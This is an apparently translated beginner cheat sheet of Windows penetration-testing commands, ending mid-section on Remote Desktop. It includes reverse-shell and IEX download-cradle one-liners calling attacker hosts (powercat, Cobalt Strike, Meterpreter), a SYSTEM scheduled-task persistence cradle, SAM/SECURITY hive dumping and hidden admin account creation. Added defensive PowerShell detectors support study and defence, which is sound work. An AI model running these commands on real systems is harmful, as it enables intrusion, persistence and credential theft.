Basic Windows penetration-testing commands every security beginner should know

Here I recommend my WeChat official account: Programmer Sailing.

Windows development history

Microsoft Windows was first released by Microsoft in 1985 and gradually became the most widely used operating system family Microsoft has produced.

MS-DOS era (Windows ran as a shell on top of MS-DOS)

Version          Release
Windows 1.0      1985.11
Windows 2.0      1987.12
Windows 2.1      1988
Windows 3.0      1990.5
Windows 3.1      1992
Windows 3.2      1994

Windows 9x

Version          Release
Windows 95       1995.8  (introduced the Start button and taskbar)
Windows 98       1998.6  (fully graphical interface)
Windows 98 SE    1999
Windows ME       2000.9

Windows NT

Version                  Release / end of support
Windows NT 3.1           1993
Windows NT 4.0           1996.7
Windows 2000 (NT 5.0)    2000
Windows XP (NT 5.1)      released 2001.10; mainstream support ended 2009.4, extended support ended 2014.4
Windows Vista (NT 6.0)   released 2007.1; all support ended 2017.4
Windows 7 (NT 6.1)       released 2009.7; all support ended 2020.1
Windows 8 (NT 6.2)       2012.10
Windows 8.1 (NT 6.3)     2013.10
Windows 10 (NT 10.0)     2015.7

Windows Server

Version                  Release / end of support
Windows Server 2003      released 2003.3; all support ended 2015.7
Windows Server 2008      2008.2
Windows Server 2012      2012.9
Windows Server 2016      2016.10

Common directories in Windows

C:\Users\xie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup   Per-user startup folder: programs here run whenever user xie logs in
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp                All-users startup folder: programs here run whenever any user logs in (both startup folders are common persistence locations and are worth checking)
C:\Windows                                 Installation directory of the operating system
C:\Windows\System32                        Core system binaries and DLLs; the registry hive files live underneath it in C:\Windows\System32\config
C:\Windows\System32\config\SAM             The SAM hive stores local account names and NTLM password hashes (not plaintext passwords). It is held open by the system while Windows runs, so offline tools copy or edit it after booting into a PE/live environment; the process that uses it for authentication is lsass.exe
C:\PerfLogs                                Performance-monitor log directory; the Windows event logs are under C:\Windows\System32\winevt\Logs

Common cmd commands in Windows

#system information
chcp 65001                           Switch the console code page to UTF-8
systeminfo                           System information (OS version, installed hotfixes, domain, boot time)
hostname                             Host name
set                                  List all environment variables
set path                             Show the variables whose names start with "path" (PATH, PATHEXT)
color                                Change the console colour
cls                                  Clear the screen

#network
ping -t -l 65500 ip                  Continuous ping with a 65500-byte payload (the largest -l accepts), the so-called "ping of death"
ipconfig /release                    Release the DHCP lease
ipconfig /renew                      Renew the DHCP lease
ipconfig /flushdns                   Flush the DNS resolver cache
route print                          Print the routing table
arp -a                               Show the ARP cache
net view                             List other computers visible in the LAN
netsh firewall show state            Firewall status (legacy syntax; on Windows 7 / 2008 and later use netsh advfirewall show allprofiles)
netsh firewall show config           Firewall rules (legacy syntax)


#user
whoami                               Current user (whoami /all also shows the SID, group memberships and privileges)
net user                             List local users (accounts whose names end in $ are not listed)
net user xie                         Details of user xie
net localgroup                       List local groups
net localgroup administrators        Members of the administrators group
net user hack 123 /add               Create user hack with password 123
net user hack$ 123 /add              Create user hack$; the trailing $ hides it from net user, but it is still visible in lusrmgr.msc, in the SAM, and to any tool that enumerates accounts properly
net user hack /del                   Delete user hack
net localgroup administrators hack /add   Add the ordinary user hack to the administrators group (local privilege elevation)
net user guest /active:yes           Enable the guest account
net user guest /active:no            Disable the guest account
net user %USERNAME% *                Change the password of the currently logged-in user (prompts for the new password)
net user guest newpassword           Set the guest account's password to newpassword
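The commands above are the attacker's side of local account manipulation. The following is an added example, not part of the original post, showing how a defender audits the same accounts: it uses the built-in Microsoft.PowerShell.LocalAccounts cmdlets (Windows 10 / Server 2016 and later), which, unlike net user, do list accounts whose names end in $. The flag names and the 7-day "recent" window are my own choices.

```powershell
# Added example (not from the original post): audit local accounts after the
# "net user hack$" trick above. net user skips names ending in $; Get-LocalUser
# does not. Needs the Microsoft.PowerShell.LocalAccounts module.

function Get-LocalAccountReport {
    param(
        # Accounts whose password was set within this many days are flagged
        [int]$RecentDays = 7
    )
    $cutoff = (Get-Date).AddDays(-$RecentDays)

    # Members of the local Administrators group, matched by SID so that renamed
    # or $-suffixed accounts are still caught
    $adminSids = Get-LocalGroupMember -Group 'Administrators' |
        Where-Object ObjectClass -eq 'User' |
        ForEach-Object { $_.SID.Value }

    foreach ($u in Get-LocalUser) {
        $flags = @()
        if ($u.Name.EndsWith('$'))                                  { $flags += 'hidden-from-net-user' }
        if ($u.SID.Value -in $adminSids)                             { $flags += 'local-admin' }
        if ($u.PasswordLastSet -and $u.PasswordLastSet -gt $cutoff)  { $flags += 'password-set-recently' }
        if ($u.Name -eq 'Guest' -and $u.Enabled)                     { $flags += 'guest-enabled' }

        [pscustomobject]@{
            Name            = $u.Name
            Enabled         = $u.Enabled
            SID             = $u.SID.Value
            PasswordLastSet = $u.PasswordLastSet
            LastLogon       = $u.LastLogon
            Flags           = ($flags -join ',')
        }
    }
}

# Typical use: show only the accounts that raised at least one flag
Get-LocalAccountReport | Where-Object Flags | Format-Table -AutoSize
```

A freshly created hack$ account that was added to administrators shows up with all three of hidden-from-net-user, local-admin and password-set-recently, which is the combination worth investigating first.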
#Port process service
tasklist                             List processes
tasklist /v                          Verbose listing, including the user name each process runs as
netstat -ano                         All connections and listening ports, with the owning PID
netstat -ano | findstr ":80 "        PID listening on port 80 (a bare findstr 80 also matches 8080, 1800 and any PID containing 80)
tasklist | findstr <PID>             Process name for the PID found above (tasklist itself knows nothing about ports)
taskkill /f /t /im xx.exe            Kill xx.exe and its child processes (/f force, /t process tree, /im image name)
taskkill /f /pid 520                 Kill the process with PID 520
net start                            List running services
net start telnet                     Start the telnet service
net stop telnet                      Stop the telnet service
start www.baidu.com                  Open the URL in the default browser

#share
net use                              List current connections
net share                            List shares opened on the local machine
net share ipc$                       Show the ipc$ share (admin shares such as ipc$ and c$ are recreated automatically when the Server service restarts)
net share ipc$ /del                  Remove the ipc$ share
net share c$ /del                    Remove the C$ admin share

net use \\192.168.10.15\ipc$ /u:"" ""      Establish a null session (anonymous IPC connection) to 192.168.10.15; rejected or heavily restricted by default on modern Windows
net use \\192.168.10.15 /u:"" ""           Same as above; the ipc$ part may be omitted
net use \\192.168.10.15 /u:"administrator" "root"   Establish an IPC connection to 192.168.10.15 as administrator with password root
net use \\192.168.10.15 /del               Drop the IPC connection

net use \\192.168.10.15\c$ /u:"administrator" "root"   Connect to the C$ admin share on 192.168.10.15
dir \\192.168.10.15\c$                     List the root of C: on 192.168.10.15
dir \\192.168.10.15\c$\user                List the user directory on C: of 192.168.10.15
dir \\192.168.10.15\c$\user\test.exe       Show test.exe in that directory
net use \\192.168.10.15\c$ /del            Drop the C$ connection

net use k: \\192.168.10.15\c$ /u:"administrator" "root"   Map the target's C: to local drive K:
net use k: /del                                           Remove the mapping

#File operation
echo hello,world > 1.txt             Write hello,world to 1.txt (overwrites the file)
echo hello,world >> 1.txt            Append hello,world to 1.txt
del 1.txt                            Delete a file
rd /s /q dir                         Delete a folder with all its subfolders and files (deltree only exists on MS-DOS / Windows 9x)
ren 1.txt 2.txt                      Rename 1.txt to 2.txt
type 1.txt                           Print the contents of 1.txt
md dir                               Create a folder
rd dir                               Delete an empty folder
move 1.txt d:\                       Move 1.txt to the root of D:
dir c:\                              List the files on C:
dir c:\ /A                           List all files on C:, including hidden and system files
dir c:\ /S                           List C: recursively, including subfolders
dir c:\ /B                           Bare listing: file names only

shutdown -s -t 60 -c "Your computer is hacked"   -s shut down, -r restart, -a abort a pending shutdown, -t seconds of delay, -c message shown to logged-on users
copy con A.txt                       Create the text file A.txt from keyboard input:
 hello,world                          type the content,
    then press Ctrl+Z followed by Enter to finish



reg save hklm\sam sam.hive
reg save hklm\system system.hive
 The SAM hive is the local account database (user names and NTLM password hashes); the SYSTEM hive holds the boot key that encrypts those hashes, so both files are needed to recover the local administrator's hash offline. Both commands require administrator privileges.

 

Downloading files from the Windows command line (bitsadmin, certutil, iwr)

Whichever tool you use, the destination must be a directory you have write permission for; otherwise the download fails with access denied.

certutil

certutil is a certificate-management tool that can also download files. It has shipped since Windows Server 2003, but the download option is unreliable there, so treat the commands below as Windows 7 / Server 2008 and later.

certutil -urlcache -split -f http://114.118.80.138/shell.php                                 # download into the current directory

certutil -urlcache -split -f http://114.118.80.138/shell.php c:\users\xie\desktop\shell.php  # download to the given path

This command is well known to antivirus and EDR products and is usually flagged, so it is rarely usable on a real engagement. It also records the URL in certutil's local URL cache (listable with the -urlcache option), which is a useful forensic artefact for the defender.

bitsadmin

bitsadmin is the command-line client for the Background Intelligent Transfer Service (BITS), the service Windows Update uses to fetch patches, and it can download arbitrary files as well. It is not included by default on Windows XP and Server 2003; Windows 7 and later have it built in.

Some characteristics of bitsadmin:

·It copes with an unstable network: a failed transfer is retried automatically, so it is quite reliable.

·It follows HTTP redirects.

·It is not meant for fetching HTML pages the way curl or wget are.

Usage:

bitsadmin /transfer test http://files.cnblogs.com/files/gayhub/bcn.js c:\users\xie\desktop\shell.php
# "test" is the job name and can be anything. The destination must be a full path in a directory that already exists, otherwise the transfer fails.

By default a BITS job runs at low priority and is very slow. For large files raise the priority; because /transfer blocks until the job finishes, start it in a separate window and change the priority from the original one:

start bitsadmin /transfer test http://192.168.10.14/test.exe f:\test.exe
bitsadmin /setpriority test foreground     # run job test at the highest (foreground) priority

Related article: "Using bitsadmin.exe to download files, and playing more tricks with bcn.bat".

iwr

iwr is the PowerShell alias for Invoke-WebRequest. Running it from cmd means prefixing the line with powershell, which security products watch for, so it is better to start an interactive PowerShell session first and run it there.

iwr -Uri http://www.test.com/vps.exe -OutFile vps.exe -UseBasicParsing
# -UseBasicParsing skips the Internet Explorer HTML parser, so the call also works on Server Core and on hosts where IE has never been initialised
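Two things the three download commands above leave out: checking that what arrived is what you expected, and the traces certutil and bitsadmin leave on the host. The following is an added example, not part of the original post. The URL, destination path and SHA-256 value passed to Get-VerifiedFile are placeholders; the BITS event IDs 59 and 60 are the "transfer started" and "transfer stopped" events of the Microsoft-Windows-Bits-Client/Operational log.

```powershell
# Added example (not from the original post): download with hash verification,
# and the host-side traces that certutil / bitsadmin downloads leave behind.

function Get-VerifiedFile {
    param(
        [Parameter(Mandatory)][string]$Uri,
        [Parameter(Mandatory)][string]$OutFile,
        [Parameter(Mandatory)][string]$ExpectedSha256
    )
    # Fail early on the "access denied" case described above: the directory
    # must exist and be writable before the transfer starts
    $full = [IO.Path]::GetFullPath($OutFile)
    $dir  = Split-Path -Parent $full
    if (-not (Test-Path -LiteralPath $dir -PathType Container)) {
        throw "Destination directory does not exist: $dir"
    }

    Invoke-WebRequest -Uri $Uri -OutFile $full -UseBasicParsing

    # Refuse to keep a file whose hash does not match the value you were given
    $actual = (Get-FileHash -LiteralPath $full -Algorithm SHA256).Hash
    if ($actual -ne $ExpectedSha256.ToUpperInvariant()) {
        Remove-Item -LiteralPath $full -Force
        throw "SHA-256 mismatch for $Uri: expected $ExpectedSha256, got $actual"
    }
    Get-Item -LiteralPath $full
}

function Get-DownloadTraces {
    # URLs fetched with certutil -urlcache are kept per user until deleted
    $certutilCache = certutil -urlcache 2>$null | Where-Object { $_ -match '^\s*https?://' }

    # BITS jobs still queued or running; -AllUsers needs an elevated prompt
    Import-Module BitsTransfer -ErrorAction SilentlyContinue
    $bitsJobs = Get-BitsTransfer -AllUsers -ErrorAction SilentlyContinue |
        Select-Object DisplayName, JobState, OwnerAccount,
                      @{ n = 'Url'; e = { $_.FileList.RemoteName } }

    # Completed jobs survive in the BITS client log: 59 = started, 60 = stopped
    $bitsEvents = Get-WinEvent -FilterHashtable @{
            LogName = 'Microsoft-Windows-Bits-Client/Operational'; Id = 59, 60
        } -MaxEvents 50 -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message

    [pscustomobject]@{
        CertutilCache = $certutilCache
        BitsJobs      = $bitsJobs
        BitsEvents    = $bitsEvents
    }
}

# Placeholder values: replace with the real URL, path and the hash you were given
Get-VerifiedFile -Uri 'http://www.test.com/vps.exe' -OutFile 'C:\Users\xie\Desktop\vps.exe' `
                 -ExpectedSha256 '0000000000000000000000000000000000000000000000000000000000000000'
Get-DownloadTraces
```

On an engagement, Get-DownloadTraces is what you run afterwards to see what you left behind; on the defensive side the same three sources are a quick triage for "did something download a payload on this host".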

 

Scheduled tasks in Windows

schtasks is the Windows command for scheduled tasks. It runs a program or script at a chosen time or on a chosen event, and because tasks survive reboots it is one of the most common persistence mechanisms.

Create a task named test on the target host that starts C:\vps.exe every hour as SYSTEM (a task with /ru system can only be created from an administrator prompt):
schtasks /create /tn test /sc HOURLY /mo 1 /tr c:\vps.exe /ru system /f

The same idea with a PowerShell download cradle as the action. Choose one of onstart, onlogon or hourly for /sc (/mo 1 only applies to hourly); the syswow64 path is the 32-bit PowerShell on a 64-bit system, and http://xx.xx.xx.xx is a placeholder for the attacker's host. The cradle is passed to -c unquoted, as in the PowerShell section below: wrapping it in single quotes would make PowerShell treat it as a string literal instead of running it.
schtasks /create /tn test /sc onlogon /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx'))" /ru system /f

Query the task named test:
schtasks /query | findstr test

Run the task immediately:
schtasks /run /i /tn "test"

Delete the task:
schtasks /delete /tn "test" /f

Parameters:

/tn: name of the scheduled task

/sc: schedule type, i.e. when the task runs

·/sc onstart   run when the system starts

·/sc onlogon   run when a user logs on

·/sc onidle /i 30   run once the machine has been idle for 30 minutes

·/sc hourly   run every hour (/mo n runs every n hours)

·/sc minute   run every minute (/mo n runs every n minutes)

/ed: end date after which the task stops running. If omitted, the task repeats indefinitely. An end time can be given with /et, for example:

· /ed 01/10/2020 /et 20:00

/tr: the program or script to run

/ru: the account to run as, e.g. system or a user name such as %USERNAME% (the password for a user account is given with /rp)
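The task above has a recognisable shape: a script interpreter as the action, a hidden window, an execution-policy bypass, a download cradle, and SYSTEM as the principal. The following is an added example, not part of the original post, that looks for that shape in the registered tasks using the built-in Get-ScheduledTask cmdlet (Windows 8 / Server 2012 and later). The indicator names and the "SYSTEM plus one more indicator" threshold are my own choices; many legitimate Microsoft tasks run as SYSTEM, which is why SYSTEM alone is not reported.

```powershell
# Added example (not from the original post): flag scheduled tasks that match the
# persistence pattern shown above.

function Get-TaskActionIndicators {
    param([string]$Execute, [string]$Arguments)
    $cmd = "$Execute $Arguments"
    # Regexes are case-insensitive in PowerShell by default
    $checks = [ordered]@{
        'script-host'     = 'powershell(\.exe)?|pwsh|cmd\.exe|wscript|cscript|mshta|rundll32|regsvr32'
        'hidden-window'   = '-w(indowstyle)?\s+hidden'
        'policy-bypass'   = '-e(xec|xecutionpolicy|p)\s+bypass'
        'encoded-command' = '-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}'
        'download-cradle' = 'downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b|bitsadmin|certutil'
        'user-writable'   = '\\users\\|\\temp\\|\\appdata\\|\\programdata\\'
    }
    foreach ($name in $checks.Keys) {
        if ($cmd -match $checks[$name]) { $name }
    }
}

function Find-SuspiciousScheduledTask {
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }        # COM-handler actions have no command line
            $ind = @(Get-TaskActionIndicators -Execute $action.Execute -Arguments $action.Arguments)
            $runAs = $task.Principal.UserId
            if ($runAs -eq 'SYSTEM' -or $runAs -eq 'S-1-5-18') { $ind += 'runs-as-system' }

            # Report a cradle or bypass outright; SYSTEM only together with another indicator
            if (($ind -contains 'download-cradle') -or ($ind -contains 'policy-bypass') -or
                (($ind -contains 'runs-as-system') -and $ind.Count -ge 2)) {
                [pscustomobject]@{
                    Task       = $task.TaskPath + $task.TaskName
                    State      = $task.State
                    RunAs      = $runAs
                    Command    = "$($action.Execute) $($action.Arguments)".Trim()
                    Indicators = ($ind -join ',')
                }
            }
        }
    }
}

# Offline check against the action from the schtasks example above (constructed input):
Get-TaskActionIndicators -Execute 'c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe' `
    -Arguments "-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx'))"
# yields script-host, hidden-window, policy-bypass, download-cradle

# Live sweep of the local task store
Find-SuspiciousScheduledTask | Format-Table -AutoSize
```

The user-writable indicator catches the other common variant, where the action is an ordinary binary dropped somewhere the attacker could write to, such as the C:\vps.exe style path in the first example.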

 

Load and execute PowerShell scripts in Windows

Windows PowerShell is a command-line shell and scripting environment that gives command-line users and script writers access to the .NET Framework.

Windows XP and Server 2003 do not ship with PowerShell; Windows 7, Server 2008 and later do. More on PowerShell usage: "Analysis of PowerShell usage".

Load and execute a PowerShell script locally

With powerview.ps1 in the current directory of the cmd window, load it and run its Get-NetDomain function:

powershell -exec bypass Import-Module .\powerview.ps1;Get-NetDomain

Download and execute a PowerShell script remotely

Download and execute test.ps1 from a remote host; then download powerview.ps1 the same way and call Get-NetDomain. IEX runs the downloaded text in the current session, so the functions it defines are immediately available and no Import-Module of a local file is needed (xx.xx.xx.xx is the attacker's host):

powershell -exec bypass -c IEX (New-Object System.Net.Webclient).DownloadString('http://xx.xx.xx.xx/test.ps1')
powershell -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('http://xx.xx.xx.xx/powerview.ps1');Get-NetDomain"

 

Batch files in Windows

@echo off            Suppress echoing of the commands that follow
echo                 Print the text that follows
title                Set the window title
rem                  Comment
cls                  Clear the window
set /a               Arithmetic assignment
set /p name=         Read user input into the variable name
%name%               Expand the variable name
if / else            Conditional
FOR /F %%i in (ip.txt) do echo %%i          Loop over the lines of ip.txt and print each one in the same window
FOR /F %%i in (ip.txt) do start echo %%i    Same, but each echo runs in a new window
GEQ                  Greater than or equal (comparison operator for if; the others are EQU, NEQ, LSS, LEQ, GTR)
LSS                  Less than
goto :label          Jump to a label declared as :label
exit                 Exit the batch file
start                Start a program or open a file
call                 Call another batch file and return when it finishes
dir c:\*.*>a.txt     Write the file listing of C: to a.txt
del                  Delete one or more files

Shortcut key operation in Windows

Alt+Tab              Switch between programs
Alt+F4               Close the current program
Alt (+drag)          Rectangular (column) selection in editors that support it
Alt+double-click     Show file properties
Shift+Delete         Delete permanently, bypassing the Recycle Bin
Ctrl+.               Switch Chinese/English punctuation (Chinese IME)
Ctrl+S               Save
Ctrl+N               New
Ctrl+W               Close the window or tab
Ctrl+U               Underline
Ctrl+Z               Undo
Ctrl+B               Bold
Ctrl+I               Italic
Ctrl+Shift+Esc       Open Task Manager
Win+D                Show the desktop
Win+I                Open Settings
Win+A                Open the Action Center
Win+Q                Open Cortana / search
Win+X                Open the Quick Link (power user) menu
Win+Pause            System properties

Commands for the Windows Run dialog (Win+R)

dxdiag               DirectX diagnostics: hardware configuration
control              Control Panel
services.msc         Services
msconfig             System Configuration
regedit              Registry Editor
ncpa.cpl             Network Connections
firewall.cpl         Windows Firewall
devmgmt.msc          Device Manager
diskmgmt.msc         Disk Management
compmgmt.msc         Computer Management
winver               Show the Windows version
write                WordPad
mspaint              Paint
mstsc                Remote Desktop Connection
magnify              Magnifier
notepad              Notepad
shrpubw              Create Shared Folder wizard
calc                 Calculator
osk                  On-Screen Keyboard

Registry in Windows

The registry is the central configuration database of Microsoft Windows; the system and applications store their configuration in it.

· HKEY_CLASSES_ROOT (HKCR): file-type associations and COM registrations, e.g. which program opens a given extension. It is a merged view of HKLM\Software\Classes and HKCU\Software\Classes.

· HKEY_CURRENT_USER (HKCU): settings of the currently logged-on user; it is a link to that user's subtree under HKEY_USERS. It does not hold passwords.

· HKEY_LOCAL_MACHINE (HKLM): machine-wide configuration, loaded from the hive files under C:\Windows\System32\config (SAM, SECURITY, SOFTWARE, SYSTEM). It holds the hardware configuration, installed services and the local account database, and it is the root exposed to remote administrators through the Remote Registry service.

· HKEY_USERS (HKU): the loaded user profiles, one subkey per user SID plus .DEFAULT. Password hashes are not stored here; they are in HKLM\SAM.

· HKEY_CURRENT_CONFIG (HKCC): the current hardware profile, a link into HKLM\SYSTEM\CurrentControlSet\Hardware Profiles\Current.

Use reg to save the SAM, SYSTEM and SECURITY hives from the registry

The following commands require administrator privileges:

reg save hklm\sam c:\users\mi\desktop\sam
reg save hklm\system c:\users\mi\desktop\system
reg save hklm\security c:\users\mi\desktop\security

SAM holds the local account hashes, SYSTEM the boot key needed to decrypt them, and SECURITY the LSA secrets and cached domain logon credentials.

 

Ports in Windows

·Well-known ports: 0-1023, assigned to standard services

·Registered ports: 1024-49151, loosely bound to services

·Dynamic/private ports: 49152-65535, normally not assigned to any service

Closing a port:

Closing a port from the command line really means adding a firewall rule. Open cmd as administrator and run the following; the example blocks inbound TCP port 139:

netsh advfirewall set allprofiles state on
netsh advfirewall firewall add rule name=test dir=in action=block protocol=TCP localport=139   # to block a different port, replace 139

The same rule can be created in the Windows Firewall graphical interface (Advanced Security, Inbound Rules, New Rule, Port).

 

Processes in Windows

Windows processes fall into system processes and application processes.

Ctrl+Shift+Esc opens Task Manager to inspect processes; processes whose user name is SYSTEM are system processes.

Some common system processes and what they do:

· conime.exe: console input method editor; keeps input methods working in console windows

· csrss.exe: the Client/Server Runtime Subsystem, the user-mode part of the Win32 subsystem (console windows, process and thread housekeeping)

· ctfmon.exe: input-method and language-bar support; keeps the language bar visible in the taskbar

· explorer.exe: Windows Explorer, the graphical shell; it draws the desktop icons, taskbar and Start menu

· lsass.exe: the Local Security Authority Subsystem; enforces the local security policy, authenticates logons and keeps credential material in memory, which is why it is the main target of credential-dumping tools

· services.exe: the Service Control Manager, which starts and stops services; it is a critical process, so terminating it is refused or crashes the system

· smss.exe: the Session Manager Subsystem, the first user-mode process; it starts csrss.exe and winlogon.exe for each session

· svchost.exe: the generic host process for services implemented as DLLs; many instances run at once, and tasklist /svc shows which services each one hosts

· System: the kernel and its threads (PID 4); it always exists

· System Idle Process: a bookkeeping entry (PID 0) that accounts for idle CPU time; when it "uses" the CPU, the CPU is idle and can enter low-power states

· winlogon.exe: handles interactive logon and logoff (Ctrl+Alt+Del, loading the user profile, starting the shell)

Common antivirus software processes

Process                    Product
360sd.exe                  360 Antivirus
360tray.exe                360 real-time protection
ZhuDongFangYu.exe          360 active defence
KSafeTray.exe              Kingsoft Guard
SafeDogUpdateCenter.exe    Server SafeDog
McShield.exe               McAfee
egui.exe                   ESET NOD32
AVP.EXE                    Kaspersky
avguard.exe                Avira
bdagent.exe                BitDefender

 

Listing ports with netstat

netstat is the Windows command for listing sockets and listening ports:

·Show all connections and listening ports, including the LISTENING, ESTABLISHED, CLOSE_WAIT and TIME_WAIT states: netstat -a

·Show addresses and ports numerically instead of resolving names: netstat -an

·Also show the PID that owns each socket: netstat -ano

·Find the PID listening on port 80: netstat -ano | findstr ":80 "  (matching on a bare 80 also hits 8080, 1800 and any PID containing 80)

·Resolve that PID to a process name: tasklist | findstr <PID>  (tasklist | findstr 80 matches names and PIDs containing 80, not ports)

·Kill the process by image name: taskkill /F /T /IM xx.exe  (/F force, /T also kill its child processes, /IM select by image name)

·Kill the process by PID: taskkill /F /PID 520
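The findstr-based lookups in this section and in the "Port process service" list above are approximate: findstr matches a substring anywhere on the line. The following is an added example, not part of the original post, that resolves a port to its owning process exactly. Get-PortOwner uses Get-NetTCPConnection (Windows 8 / Server 2012 and later); Select-NetstatPort parses netstat -ano text for older hosts or for output captured elsewhere. The sample netstat lines are constructed for the demonstration.

```powershell
# Added example (not from the original post): map a listening port to its process
# exactly instead of grepping netstat output for "80".

function Get-PortOwner {
    param([Parameter(Mandatory)][int]$Port)
    Get-NetTCPConnection -LocalPort $Port -State Listen -ErrorAction SilentlyContinue |
        ForEach-Object {
            $p  = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            # Command line comes from WMI; Path is blank for processes you cannot open
            $ci = Get-CimInstance Win32_Process -Filter "ProcessId = $($_.OwningProcess)"
            [pscustomobject]@{
                LocalAddress = $_.LocalAddress
                Port         = $_.LocalPort
                PID          = $_.OwningProcess
                Process      = $p.ProcessName
                Path         = $p.Path
                CommandLine  = $ci.CommandLine
            }
        }
}

# Parse "netstat -ano" lines and keep only sockets whose LOCAL port equals $Port
function Select-NetstatPort {
    param([string[]]$Lines, [int]$Port)
    foreach ($line in $Lines) {
        $f = $line.Trim() -split '\s+'
        # TCP lines: Proto Local Foreign State PID; UDP lines have no State column
        if ($f.Count -lt 4 -or $f[0] -notin @('TCP', 'UDP')) { continue }
        # Port is the number after the last colon, which also handles [::]:80
        $localPort = [int]($f[1] -replace '^.*:(\d+)$', '$1')
        if ($localPort -ne $Port) { continue }
        [pscustomobject]@{
            Proto   = $f[0]
            Local   = $f[1]
            Foreign = $f[2]
            State   = $(if ($f[0] -eq 'TCP') { $f[3] } else { '' })
            PID     = [int]$f[-1]
        }
    }
}

# Constructed sample: "findstr 80" would match all five lines; only the first is port 80
$sample = @(
    '  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4',
    '  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       1800',
    '  TCP    127.0.0.1:49680        127.0.0.1:445          TIME_WAIT       0',
    '  TCP    192.168.10.15:49712    203.0.113.80:443       ESTABLISHED     5216',
    '  UDP    0.0.0.0:3580           *:*                                    980'
)
Select-NetstatPort -Lines $sample -Port 80     # returns only the 0.0.0.0:80 row
Get-PortOwner -Port 80                         # live lookup on the local host
```

Get-PortOwner is also the quick answer to "which svchost is this": the CommandLine column shows the -k service group, which tasklist /svc then expands into service names.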

 

Windows reverse shell

Reverse shell to nc using PowerShell from a cmd window

In my testing this works on every Windows machine I tried.

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11 -p 8888 -e cmd

powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11 -p 8888 -e cmd.exe"

192.168.10.11 is the attacker's host, on which a netcat listener waits on port 8888.

Reverse shell to Cobalt Strike using PowerShell from a cmd window

In my experience this often fails on Windows 10, while on Windows Server 2008 R2 and earlier it works every time.

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://114.118.80.138:8080/a'))"   # runs with a hidden window

powershell.exe -c "IEX ((new-object net.webclient).downloadstring('http://114.118.80.138:8080/a'))"

Reverse shell to MSF from a cmd window

On the VPS

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=114.118.80.138 lport=7788 -f psh-reflection > 7788.ps1   # generate the payload script 7788.ps1; lhost must be the address the handler listens on

python -m SimpleHTTPServer 80   # serve the current directory over HTTP (python3 -m http.server 80 on Python 3)

#MSF handler
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 114.118.80.138
set lport 7788
exploit -j

On the target

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://114.118.80.138/7788.ps1')"   # hidden window

or

powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://114.118.80.138/7788.ps1')"

The psh-reflection script invokes the payload as soon as it is loaded, so IEX alone is enough; nothing needs to be called afterwards.
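Every one-liner in this section and in the "Load and execute PowerShell scripts" section is a download cradle: fetch text, hand it to IEX. Where PowerShell Script Block Logging is enabled (via Group Policy), each such block is written to the Microsoft-Windows-PowerShell/Operational log as event 4104, whatever the command line looked like. The following is an added example, not part of the original post, that hunts those events for cradle patterns. The pattern list is my own, not an official one; the assumption that property 2 of a 4104 event is the script text and property 3 its block id matches the event's schema.

```powershell
# Added example (not from the original post): hunt PowerShell Script Block
# Logging (event 4104) for the download cradles shown in this section.

function Get-CradlePattern {
    # One case-insensitive regex over the script block text; (?x) lets it be commented
    '(?x)
     downloadstring|downloadfile|invoke-webrequest|\biwr\b|     # fetch
     invoke-expression|\biex\b|                                 # execute
     frombase64string|-enc\w*\s+[A-Za-z0-9+/=]{20,}|            # encoded payloads
     powercat|reflection|virtualalloc|createthread              # reflective loaders / shellcode runners
    '
}

function Find-PowerShellCradle {
    param([int]$Hours = 24, [int]$MaxEvents = 5000)
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = $_.Properties[2].Value          # ScriptBlockText
            if ($text -match (Get-CradlePattern)) {
                $flat = $text -replace '\s+', ' '
                [pscustomobject]@{
                    Time     = $_.TimeCreated
                    User     = $_.UserId
                    Level    = $_.LevelDisplayName  # "Warning" = PowerShell itself judged the block suspicious
                    ScriptId = $_.Properties[3].Value
                    Snippet  = $flat.Substring(0, [Math]::Min(160, $flat.Length))
                }
            }
        }
}

# Offline check of the pattern against one cradle from this page and one benign block (constructed input)
$samples = @(
    "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11 -p 8888 -e cmd",
    'Get-ChildItem C:\Windows | Measure-Object'
)
$samples | ForEach-Object { [pscustomobject]@{ Cradle = ($_ -match (Get-CradlePattern)); Text = $_ } }

# Live hunt over the last 24 hours of 4104 events
Find-PowerShellCradle -Hours 24 | Format-Table -AutoSize
```

Because 4104 records the de-obfuscated block that actually ran, this catches the encoded and hidden-window variants from the scheduled-task section as well, not just the plain one-liners.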

 

Enabling Remote Desktop (3389) from the command line

First check which port RDP is listening on:

tasklist /svc | findstr TermService        # PID of the svchost that hosts the Terminal Services service
netstat -ano | findstr <PID from the previous step>

The following commands require administrator privileges

